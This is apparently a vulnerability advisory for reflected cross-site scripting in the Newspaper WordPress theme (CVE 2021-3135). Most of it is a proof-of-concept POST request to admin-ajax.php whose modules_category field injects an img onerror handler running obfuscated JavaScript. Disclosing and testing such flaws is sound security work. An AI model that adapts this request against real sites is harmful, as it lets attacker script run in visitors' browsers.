Newspaper < 11 – Reflected Cross-Site Scripting (XSS) | CVE 2021-3135

Description

The theme does not sanitise the td_atts.modules_category parameter in its td_ajax_search AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 12191
Connection: close

action=td_ajax_search&module=tdb_module_search&atts=%7B%22inline%22%3A%22yes%22%2C%22toggle_txt_pos%22%3A%22after%22%2C%22form_align%22%3A%22content-horiz-right%22%2C%22results_msg_align%22%3A%22content-horiz-center%22%2C%22image_floated%22%3A%22float_left%22%2C%22image_width%22%3A%2230%22%2C%22image_size%22%3A%22td_324x400%22%2C%22show_cat%22%3A%22none%22%2C%22show_btn%22%3A%22none%22%2C%22show_date%22%3A%22%22%2C%22show_review%22%3A%22%22%2C%22show_com%22%3A%22none%22%2C%22show_excerpt%22%3A%22none%22%2C%22show_author%22%3A%22none%22%2C%22art_title%22%3A%220+0+2px+0%22%2C%22all_modules_space%22%3A%2220%22%2C%22tdicon%22%3A%22td-icon-magnifier-big-rounded%22%2C%22icon_size%22%3A%22eyJhbGwiOiIyMCIsInBvcnRyYWl0IjoiMTgifQ%3D%3D%22%2C%22tdc_css%22%3A%22eyJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwb3J0cmFpdCI6eyJtYXJnaW4tdG9wIjoiMSIsImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OH0%3D%22%2C%22modules_on_row%22%3A%22eyJhbGwiOiI1MCUiLCJwb3J0cmFpdCI6IjUwJSIsImxhbmRzY2FwZSI6IjUwJSJ9%22%2C%22meta_info_horiz%22%3A%22content-horiz-left%22%2C%22form_width%22%3A%22600%22%2C%22input_border%22%3A%220+0+1px+0%22%2C%22modules_divider%22%3A%22%22%2C%22form_padding%22%3A%22eyJwb3J0cmFpdCI6IjIwcHggMjBweCAyMHB4IiwiYWxsIjoiMzBweCJ9%22%2C%22arrow_color%22%3A%22%23ffffff%22%2C%22btn_bg_h%22%3A%22rgba(0%2C0%2C0%2C0)%22%2C%22btn_tdicon%22%3A%22td-icon-menu-right%22%2C%22btn_icon_pos%22%3A%22after%22%2C%22btn_icon_size%22%3A%227%22%2C%22btn_icon_space%22%3A%228%22%2C%22f_title_font_family%22%3A%22%22%2C%22f_cat_font_family%22%3A%22%22%2C%22f_cat_font_transform%22%3A%22uppercase%22%2C%22f_title_font_weight%22%3A%22%22%2C%22f_title_font_transform%22%3A%22%22%2C%22f_title_font_size%22%3A%2213%22%2C%22title_txt_hover%22%3A%22%234db2ec%22%2C%22results_limit%22%3A%226%22%2C%22float_block%22%3A%22yes%22%2C%22icon_color%22%3A%22%23000000%22%2C%22results_border%22%3A%220+0+1px+0%22%2C%22f_title_font_line_height%22%3A%221.4%22%2C%22btn_color%22%3A%22%23000000%22%2C%22btn_color_h%22%3A%22%234db2ec%22%2C%22all_underline_color%22%3A%22%22%2C%22results_msg_color_h%22%3A%22%234db2ec%22%2C%22image_height%22%3A%22100%22%2C%22meta_padding%22%3A%223px+0+0+16px%22%2C%22modules_gap%22%3A%2220%22%2C%22mc1_tl%22%3A%2212%22%2C%22show_form%22%3A%22yes%22%2C%22f_meta_font_weight%22%3A%22%22%2C%22h_effect%22%3A%22%22%2C%22results_msg_padding%22%3A%2210px+0%22%2C%22f_results_msg_font_style%22%3A%22normal%22%2C%22video_icon%22%3A%2224%22%2C%22modules_divider_color%22%3A%22%22%2C%22modules_border_color%22%3A%22%22%2C%22btn_padding%22%3A%220%22%2C%22form_border%22%3A%220%22%2C%22form_shadow_shadow_offset_vertical%22%3A%223%22%2C%22results_padding%22%3A%220+30px+30px%22%2C%22btn_bg%22%3A%22rgba(0%2C0%2C0%2C0)%22%2C%22icon_padding%22%3A%22eyJhbGwiOjIuNCwicG9ydHJhaXQiOiIyLjYifQ%3D%3D%22%2C%22block_type%22%3A%22tdb_header_search%22%2C%22separator%22%3A%22%22%2C%22toggle_txt%22%3A%22%22%2C%22toggle_txt_align%22%3A%220%22%2C%22toggle_txt_space%22%3A%22%22%2C%22toggle_horiz_align%22%3A%22content-horiz-left%22%2C%22form_offset%22%3A%22%22%2C%22form_offset_left%22%3A%22%22%2C%22form_content_width%22%3A%22%22%2C%22form_align_screen%22%3A%22%22%2C%22input_placeholder%22%3A%22%22%2C%22placeholder_travel%22%3A%220%22%2C%22input_padding%22%3A%22%22%2C%22input_radius%22%3A%22%22%2C%22btn_text%22%3A%22Search%22%2C%22btn_icon_align%22%3A%220%22%2C%22btn_margin%22%3A%22%22%2C%22btn_border%22%3A%22%22%2C%22btn_radius%22%3A%22%22%2C%22results_msg_border%22%3A%22%22%2C%22mc1_title_tag%22%3A%22%22%2C%22mc1_el%22%3A%22%22%2C%22m_padding%22%3A%22%22%2C%22modules_border_size%22%3A%22%22%2C%22modules_border_style%22%3A%22%22%2C%22image_alignment%22%3A%2250%22%2C%22image_radius%22%3A%22%22%2C%22hide_image%22%3A%22%22%2C%22show_vid_t%22%3A%22block%22%2C%22vid_t_margin%22%3A%22%22%2C%22vid_t_padding%22%3A%22%22%2C%22vid_t_color%22%3A%22%22%2C%22vid_t_bg_color%22%3A%22%22%2C%22f_vid_time_font_header%22%3A%22%22%2C%22f_vid_time_font_title%22%3A%22Video+duration+text%22%2C%22f_vid_time_font_settings%22%3A%22%22%2C%22f_vid_time_font_family%22%3A%22%22%2C%22f_vid_time_font_size%22%3A%22%22%2C%22f_vid_time_font_line_height%22%3A%22%22%2C%22f_vid_time_font_style%22%3A%22%22%2C%22f_vid_time_font_weight%22%3A%22%22%2C%22f_vid_time_font_transform%22%3A%22%22%2C%22f_vid_time_font_spacing%22%3A%22%22%2C%22f_vid_time_%22%3A%22%22%2C%22meta_info_align%22%3A%22%22%2C%22meta_width%22%3A%22%22%2C%22meta_margin%22%3A%22%22%2C%22meta_info_border_size%22%3A%22%22%2C%22meta_info_border_style%22%3A%22%22%2C%22meta_info_border_color%22%3A%22%23eaeaea%22%2C%22art_btn%22%3A%22%22%2C%22modules_category%22%3A%22\"><img+src=x+onerror=constructor.constructor('aler'%2b't(document.domain)')()>%22%2C%22modules_category_margin%22%3A%22%22%2C%22modules_category_padding%22%3A%22%22%2C%22modules_cat_border%22%3A%22%22%2C%22modules_category_radius%22%3A%220%22%2C%22author_photo%22%3A%22%22%2C%22author_photo_size%22%3A%22%22%2C%22author_photo_space%22%3A%22%22%2C%22author_photo_radius%22%3A%22%22%2C%22show_modified_date%22%3A%22%22%2C%22time_ago%22%3A%22%22%2C%22time_ago_add_txt%22%3A%22ago%22%2C%22review_space%22%3A%22%22%2C%22review_size%22%3A%222.5%22%2C%22review_distance%22%3A%22%22%2C%22art_excerpt%22%3A%22%22%2C%22excerpt_col%22%3A%221%22%2C%22excerpt_gap%22%3A%22%22%2C%22excerpt_middle%22%3A%22%22%2C%22btn_title%22%3A%22%22%2C%22btn_border_width%22%3A%22%22%2C%22form_general_bg%22%3A%22%22%2C%22icon_color_h%22%3A%22%22%2C%22toggle_txt_color%22%3A%22%22%2C%22toggle_txt_color_h%22%3A%22%22%2C%22f_toggle_txt_font_header%22%3A%22%22%2C%22f_toggle_txt_font_title%22%3A%22Text%22%2C%22f_toggle_txt_font_settings%22%3A%22%22%2C%22f_toggle_txt_font_family%22%3A%22%22%2C%22f_toggle_txt_font_size%22%3A%22%22%2C%22f_toggle_txt_font_line_height%22%3A%22%22%2C%22f_toggle_txt_font_style%22%3A%22%22%2C%22f_toggle_txt_font_weight%22%3A%22%22%2C%22f_toggle_txt_font_transform%22%3A%22%22%2C%22f_toggle_txt_font_spacing%22%3A%22%22%2C%22f_toggle_txt_%22%3A%22%22%2C%22form_bg%22%3A%22%22%2C%22form_border_color%22%3A%22%22%2C%22form_shadow_shadow_header%22%3A%22%22%2C%22form_shadow_shadow_title%22%3A%22Shadow%22%2C%22form_shadow_shadow_size%22%3A%22%22%2C%22form_shadow_shadow_offset_horizontal%22%3A%22%22%2C%22form_shadow_shadow_spread%22%3A%22%22%2C%22form_shadow_shadow_color%22%3A%22%22%2C%22input_color%22%3A%22%22%2C%22placeholder_color%22%3A%22%22%2C%22placeholder_opacity%22%3A%220%22%2C%22input_bg%22%3A%22%22%2C%22input_border_color%22%3A%22%22%2C%22input_shadow_shadow_header%22%3A%22%22%2C%22input_shadow_shadow_title%22%3A%22Input+shadow%22%2C%22input_shadow_shadow_size%22%3A%22%22%2C%22input_shadow_shadow_offset_horizontal%22%3A%22%22%2C%22input_shadow_shadow_offset_vertical%22%3A%22%22%2C%22input_shadow_shadow_spread%22%3A%22%22%2C%22input_shadow_shadow_color%22%3A%22%22%2C%22btn_icon_color%22%3A%22%22%2C%22btn_icon_color_h%22%3A%22%22%2C%22btn_border_color%22%3A%22%22%2C%22btn_border_color_h%22%3A%22%22%2C%22btn_shadow_shadow_header%22%3A%22%22%2C%22btn_shadow_shadow_title%22%3A%22Button+shadow%22%2C%22btn_shadow_shadow_size%22%3A%22%22%2C%22btn_shadow_shadow_offset_horizontal%22%3A%22%22%2C%22btn_shadow_shadow_offset_vertical%22%3A%22%22%2C%22btn_shadow_shadow_spread%22%3A%22%22%2C%22btn_shadow_shadow_color%22%3A%22%22%2C%22f_input_font_header%22%3A%22%22%2C%22f_input_font_title%22%3A%22Input+text%22%2C%22f_input_font_settings%22%3A%22%22%2C%22f_input_font_family%22%3A%22%22%2C%22f_input_font_size%22%3A%22%22%2C%22f_input_font_line_height%22%3A%22%22%2C%22f_input_font_style%22%3A%22%22%2C%22f_input_font_weight%22%3A%22%22%2C%22f_input_font_transform%22%3A%22%22%2C%22f_input_font_spacing%22%3A%22%22%2C%22f_input_%22%3A%22%22%2C%22f_placeholder_font_title%22%3A%22Placeholder+text%22%2C%22f_placeholder_font_settings%22%3A%22%22%2C%22f_placeholder_font_family%22%3A%22%22%2C%22f_placeholder_font_size%22%3A%22%22%2C%22f_placeholder_font_line_height%22%3A%22%22%2C%22f_placeholder_font_style%22%3A%22%22%2C%22f_placeholder_font_weight%22%3A%22%22%2C%22f_placeholder_font_transform%22%3A%22%22%2C%22f_placeholder_font_spacing%22%3A%22%22%2C%22f_placeholder_%22%3A%22%22%2C%22f_btn_font_title%22%3A%22Button+text%22%2C%22f_btn_font_settings%22%3A%22%22%2C%22f_btn_font_family%22%3A%22%22%2C%22f_btn_font_size%22%3A%22%22%2C%22f_btn_font_line_height%22%3A%22%22%2C%22f_btn_font_style%22%3A%22%22%2C%22f_btn_font_weight%22%3A%22%22%2C%22f_btn_font_transform%22%3A%22%22%2C%22f_btn_font_spacing%22%3A%22%22%2C%22f_btn_%22%3A%22%22%2C%22results_bg%22%3A%22%22%2C%22results_border_color%22%3A%22%22%2C%22results_msg_color%22%3A%22%22%2C%22results_msg_bg%22%3A%22%22%2C%22results_msg_border_color%22%3A%22%22%2C%22f_results_msg_font_header%22%3A%22%22%2C%22f_results_msg_font_title%22%3A%22Text%22%2C%22f_results_msg_font_settings%22%3A%22%22%2C%22f_results_msg_font_family%22%3A%22%22%2C%22f_results_msg_font_size%22%3A%22%22%2C%22f_results_msg_font_line_height%22%3A%22%22%2C%22f_results_msg_font_weight%22%3A%22%22%2C%22f_results_msg_font_transform%22%3A%22%22%2C%22f_results_msg_font_spacing%22%3A%22%22%2C%22f_results_msg_%22%3A%22%22%2C%22m_bg%22%3A%22%22%2C%22color_overlay%22%3A%22%22%2C%22shadow_module_shadow_header%22%3A%22%22%2C%22shadow_module_shadow_title%22%3A%22Module+Shadow%22%2C%22shadow_module_shadow_size%22%3A%22%22%2C%22shadow_module_shadow_offset_horizontal%22%3A%22%22%2C%22shadow_module_shadow_offset_vertical%22%3A%22%22%2C%22shadow_module_shadow_spread%22%3A%22%22%2C%22shadow_module_shadow_color%22%3A%22%22%2C%22title_txt%22%3A%22%22%2C%22all_underline_height%22%3A%22%22%2C%22cat_bg%22%3A%22%22%2C%22cat_bg_hover%22%3A%22%22%2C%22cat_txt%22%3A%22%22%2C%22cat_txt_hover%22%3A%22%22%2C%22cat_border%22%3A%22%22%2C%22cat_border_hover%22%3A%22%22%2C%22meta_bg%22%3A%22%22%2C%22author_txt%22%3A%22%22%2C%22author_txt_hover%22%3A%22%22%2C%22date_txt%22%3A%22%22%2C%22ex_txt%22%3A%22%22%2C%22com_bg%22%3A%22%22%2C%22com_txt%22%3A%22%22%2C%22rev_txt%22%3A%22%22%2C%22shadow_meta_shadow_header%22%3A%22%22%2C%22shadow_meta_shadow_title%22%3A%22Meta+info+shadow%22%2C%22shadow_meta_shadow_size%22%3A%22%22%2C%22shadow_meta_shadow_offset_horizontal%22%3A%22%22%2C%22shadow_meta_shadow_offset_vertical%22%3A%22%22%2C%22shadow_meta_shadow_spread%22%3A%22%22%2C%22shadow_meta_shadow_color%22%3A%22%22%2C%22btn_bg_hover%22%3A%22%22%2C%22btn_txt%22%3A%22%22%2C%22btn_txt_hover%22%3A%22%22%2C%22btn_border_hover%22%3A%22%22%2C%22f_title_font_header%22%3A%22%22%2C%22f_title_font_title%22%3A%22Article+title%22%2C%22f_title_font_settings%22%3A%22%22%2C%22f_title_font_style%22%3A%22%22%2C%22f_title_font_spacing%22%3A%22%22%2C%22f_title_%22%3A%22%22%2C%22f_cat_font_title%22%3A%22Article+category+tag%22%2C%22f_cat_font_settings%22%3A%22%22%2C%22f_cat_font_size%22%3A%22%22%2C%22f_cat_font_line_height%22%3A%22%22%2C%22f_cat_font_style%22%3A%22%22%2C%22f_cat_font_weight%22%3A%22%22%2C%22f_cat_font_spacing%22%3A%22%22%2C%22f_cat_%22%3A%22%22%2C%22f_meta_font_title%22%3A%22Article+meta+info%22%2C%22f_meta_font_settings%22%3A%22%22%2C%22f_meta_font_family%22%3A%22%22%2C%22f_meta_font_size%22%3A%22%22%2C%22f_meta_font_line_height%22%3A%22%22%2C%22f_meta_font_style%22%3A%22%22%2C%22f_meta_font_transform%22%3A%22%22%2C%22f_meta_font_spacing%22%3A%22%22%2C%22f_meta_%22%3A%22%22%2C%22f_ex_font_title%22%3A%22Article+excerpt%22%2C%22f_ex_font_settings%22%3A%22%22%2C%22f_ex_font_family%22%3A%22%22%2C%22f_ex_font_size%22%3A%22%22%2C%22f_ex_font_line_height%22%3A%22%22%2C%22f_ex_font_style%22%3A%22%22%2C%22f_ex_font_weight%22%3A%22%22%2C%22f_ex_font_transform%22%3A%22%22%2C%22f_ex_font_spacing%22%3A%22%22%2C%22f_ex_%22%3A%22%22%2C%22el_class%22%3A%22%22%2C%22block_template_id%22%3A%22%22%2C%22td_column_number%22%3A3%2C%22header_color%22%3A%22%22%2C%22ajax_pagination_infinite_stop%22%3A%22%22%2C%22offset%22%3A%22%22%2C%22limit%22%3A%225%22%2C%22td_ajax_preloading%22%3A%22%22%2C%22td_ajax_filter_type%22%3A%22%22%2C%22td_filter_default_txt%22%3A%22%22%2C%22td_ajax_filter_ids%22%3A%22%22%2C%22color_preset%22%3A%22%22%2C%22ajax_pagination%22%3A%22%22%2C%22border_top%22%3A%22%22%2C%22css%22%3A%22%22%2C%22class%22%3A%22tdi_58%22%2C%22tdc_css_class%22%3A%22tdi_58%22%2C%22tdc_css_class_style%22%3A%22tdi_58_rand_style%22%7D&td_string=x&limit=6